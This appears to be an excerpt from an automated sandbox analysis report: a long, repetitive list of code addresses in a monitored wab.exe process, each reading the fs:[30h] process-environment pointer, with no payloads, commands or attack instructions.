        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB273 mov eax, dword ptr fs:[00000030h]12_2_232EB273
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB273 mov eax, dword ptr fs:[00000030h]12_2_232EB273
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB273 mov eax, dword ptr fs:[00000030h]12_2_232EB273
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331F24A mov eax, dword ptr fs:[00000030h]12_2_2331F24A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF247 mov eax, dword ptr fs:[00000030h]12_2_233AF247
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h]12_2_233CB2BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h]12_2_233CB2BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h]12_2_233CB2BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h]12_2_233CB2BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E92AF mov eax, dword ptr fs:[00000030h]12_2_232E92AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B92AB mov eax, dword ptr fs:[00000030h]12_2_233B92AB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF2AE mov eax, dword ptr fs:[00000030h]12_2_233AF2AE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233142AF mov eax, dword ptr fs:[00000030h]12_2_233142AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233142AF mov eax, dword ptr fs:[00000030h]12_2_233142AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EC2B0 mov ecx, dword ptr fs:[00000030h]12_2_232EC2B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E289 mov eax, dword ptr fs:[00000030h]12_2_2336E289
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F7290 mov eax, dword ptr fs:[00000030h]12_2_232F7290
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F7290 mov eax, dword ptr fs:[00000030h]12_2_232F7290
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F7290 mov eax, dword ptr fs:[00000030h]12_2_232F7290
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232ED2EC mov eax, dword ptr fs:[00000030h]12_2_232ED2EC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232ED2EC mov eax, dword ptr fs:[00000030h]12_2_232ED2EC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h]12_2_233002F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h]12_2_233002F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h]12_2_233002F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h]12_2_233002F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h]12_2_233002F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h]12_2_233002F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h]12_2_233002F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h]12_2_233002F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E72E0 mov eax, dword ptr fs:[00000030h]12_2_232E72E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h]12_2_232FA2E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h]12_2_232FA2E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h]12_2_232FA2E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h]12_2_232FA2E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h]12_2_232FA2E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h]12_2_232FA2E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h]12_2_232F82E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h]12_2_232F82E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h]12_2_232F82E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h]12_2_232F82E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233132C5 mov eax, dword ptr fs:[00000030h]12_2_233132C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C32C9 mov eax, dword ptr fs:[00000030h]12_2_233C32C9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF13E mov eax, dword ptr fs:[00000030h]12_2_233AF13E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23327128 mov eax, dword ptr fs:[00000030h]12_2_23327128
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23327128 mov eax, dword ptr fs:[00000030h]12_2_23327128
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F510D mov eax, dword ptr fs:[00000030h]12_2_232F510D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23320118 mov eax, dword ptr fs:[00000030h]12_2_23320118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h]12_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331510F mov eax, dword ptr fs:[00000030h]12_2_2331510F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2334717A mov eax, dword ptr fs:[00000030h]12_2_2334717A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2334717A mov eax, dword ptr fs:[00000030h]12_2_2334717A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F6179 mov eax, dword ptr fs:[00000030h]12_2_232F6179
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332716D mov eax, dword ptr fs:[00000030h]12_2_2332716D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EA147 mov eax, dword ptr fs:[00000030h]12_2_232EA147
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EA147 mov eax, dword ptr fs:[00000030h]12_2_232EA147
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EA147 mov eax, dword ptr fs:[00000030h]12_2_232EA147
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C3157 mov eax, dword ptr fs:[00000030h]12_2_233C3157
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C3157 mov eax, dword ptr fs:[00000030h]12_2_233C3157
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C3157 mov eax, dword ptr fs:[00000030h]12_2_233C3157
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332415F mov eax, dword ptr fs:[00000030h]12_2_2332415F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338314A mov eax, dword ptr fs:[00000030h]12_2_2338314A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338314A mov eax, dword ptr fs:[00000030h]12_2_2338314A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338314A mov eax, dword ptr fs:[00000030h]12_2_2338314A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338314A mov eax, dword ptr fs:[00000030h]12_2_2338314A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C5149 mov eax, dword ptr fs:[00000030h]12_2_233C5149
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233241BB mov ecx, dword ptr fs:[00000030h]12_2_233241BB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233241BB mov eax, dword ptr fs:[00000030h]12_2_233241BB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233241BB mov eax, dword ptr fs:[00000030h]12_2_233241BB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C51B6 mov eax, dword ptr fs:[00000030h]12_2_233C51B6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233231BE mov eax, dword ptr fs:[00000030h]12_2_233231BE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233231BE mov eax, dword ptr fs:[00000030h]12_2_233231BE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E1A4 mov eax, dword ptr fs:[00000030h]12_2_2332E1A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E1A4 mov eax, dword ptr fs:[00000030h]12_2_2332E1A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331190 mov eax, dword ptr fs:[00000030h]12_2_23331190
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331190 mov eax, dword ptr fs:[00000030h]12_2_23331190
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23319194 mov eax, dword ptr fs:[00000030h]12_2_23319194
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F4180 mov eax, dword ptr fs:[00000030h]12_2_232F4180
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F4180 mov eax, dword ptr fs:[00000030h]12_2_232F4180
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F4180 mov eax, dword ptr fs:[00000030h]12_2_232F4180
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233001F1 mov eax, dword ptr fs:[00000030h]12_2_233001F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233001F1 mov eax, dword ptr fs:[00000030h]12_2_233001F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233001F1 mov eax, dword ptr fs:[00000030h]12_2_233001F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331F1F0 mov eax, dword ptr fs:[00000030h]12_2_2331F1F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331F1F0 mov eax, dword ptr fs:[00000030h]12_2_2331F1F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E81EB mov eax, dword ptr fs:[00000030h]12_2_232E81EB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F91E5 mov eax, dword ptr fs:[00000030h]12_2_232F91E5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F91E5 mov eax, dword ptr fs:[00000030h]12_2_232F91E5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h]12_2_232FA1E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h]12_2_232FA1E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h]12_2_232FA1E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h]12_2_232FA1E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h]12_2_232FA1E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h]12_2_2331B1E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h]12_2_2331B1E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h]12_2_2331B1E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h]12_2_2331B1E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h]12_2_2331B1E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h]12_2_2331B1E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h]12_2_2331B1E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B81EE mov eax, dword ptr fs:[00000030h]12_2_233B81EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B81EE mov eax, dword ptr fs:[00000030h]12_2_233B81EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E91F0 mov eax, dword ptr fs:[00000030h]12_2_232E91F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E91F0 mov eax, dword ptr fs:[00000030h]12_2_232E91F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233001C0 mov eax, dword ptr fs:[00000030h]12_2_233001C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233001C0 mov eax, dword ptr fs:[00000030h]12_2_233001C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h]12_2_233051C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h]12_2_233051C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h]12_2_233051C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h]12_2_233051C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232ED02D mov eax, dword ptr fs:[00000030h]12_2_232ED02D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F8009 mov eax, dword ptr fs:[00000030h]12_2_232F8009
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23315004 mov eax, dword ptr fs:[00000030h]12_2_23315004
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23315004 mov ecx, dword ptr fs:[00000030h]12_2_23315004
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23399060 mov eax, dword ptr fs:[00000030h]12_2_23399060
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F6074 mov eax, dword ptr fs:[00000030h]12_2_232F6074
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F6074 mov eax, dword ptr fs:[00000030h]12_2_232F6074
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F7072 mov eax, dword ptr fs:[00000030h]12_2_232F7072
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C505B mov eax, dword ptr fs:[00000030h]12_2_233C505B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23320044 mov eax, dword ptr fs:[00000030h]12_2_23320044
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F1051 mov eax, dword ptr fs:[00000030h]12_2_232F1051
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F1051 mov eax, dword ptr fs:[00000030h]12_2_232F1051
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C50B7 mov eax, dword ptr fs:[00000030h]12_2_233C50B7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AB0AF mov eax, dword ptr fs:[00000030h]12_2_233AB0AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233300A5 mov eax, dword ptr fs:[00000030h]12_2_233300A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h]12_2_2339F0A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h]12_2_2339F0A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h]12_2_2339F0A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h]12_2_2339F0A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h]12_2_2339F0A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h]12_2_2339F0A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h]12_2_2339F0A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h]12_2_233C4080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h]12_2_233C4080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h]12_2_233C4080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h]12_2_233C4080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h]12_2_233C4080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h]12_2_233C4080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h]12_2_233C4080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EA093 mov ecx, dword ptr fs:[00000030h]12_2_232EA093
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EC090 mov eax, dword ptr fs:[00000030h]12_2_232EC090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332D0F0 mov eax, dword ptr fs:[00000030h]12_2_2332D0F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332D0F0 mov ecx, dword ptr fs:[00000030h]12_2_2332D0F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h]12_2_232E90F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h]12_2_232E90F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h]12_2_232E90F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h]12_2_232E90F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EC0F6 mov eax, dword ptr fs:[00000030h]12_2_232EC0F6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330B0D0 mov eax, dword ptr fs:[00000030h]12_2_2330B0D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h]12_2_232EB0D6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h]12_2_232EB0D6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h]12_2_232EB0D6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h]12_2_232EB0D6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23319723 mov eax, dword ptr fs:[00000030h]12_2_23319723
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h]12_2_232EB705
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h]12_2_232EB705
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h]12_2_232EB705
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h]12_2_232EB705
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF717 mov eax, dword ptr fs:[00000030h]12_2_233AF717
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FD700 mov ecx, dword ptr fs:[00000030h]12_2_232FD700
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B970B mov eax, dword ptr fs:[00000030h]12_2_233B970B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B970B mov eax, dword ptr fs:[00000030h]12_2_233B970B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F471B mov eax, dword ptr fs:[00000030h]12_2_232F471B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F471B mov eax, dword ptr fs:[00000030h]12_2_232F471B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331270D mov eax, dword ptr fs:[00000030h]12_2_2331270D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331270D mov eax, dword ptr fs:[00000030h]12_2_2331270D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331270D mov eax, dword ptr fs:[00000030h]12_2_2331270D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23320774 mov eax, dword ptr fs:[00000030h]12_2_23320774
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23302760 mov ecx, dword ptr fs:[00000030h]12_2_23302760
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331763 mov eax, dword ptr fs:[00000030h]12_2_23331763
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331763 mov eax, dword ptr fs:[00000030h]12_2_23331763
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331763 mov eax, dword ptr fs:[00000030h]12_2_23331763
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331763 mov eax, dword ptr fs:[00000030h]12_2_23331763
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331763 mov eax, dword ptr fs:[00000030h]12_2_23331763
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331763 mov eax, dword ptr fs:[00000030h]12_2_23331763
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F4779 mov eax, dword ptr fs:[00000030h]12_2_232F4779
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F4779 mov eax, dword ptr fs:[00000030h]12_2_232F4779
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23312755 mov eax, dword ptr fs:[00000030h]12_2_23312755
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23312755 mov eax, dword ptr fs:[00000030h]12_2_23312755
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23312755 mov eax, dword ptr fs:[00000030h]12_2_23312755
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23312755 mov ecx, dword ptr fs:[00000030h]12_2_23312755
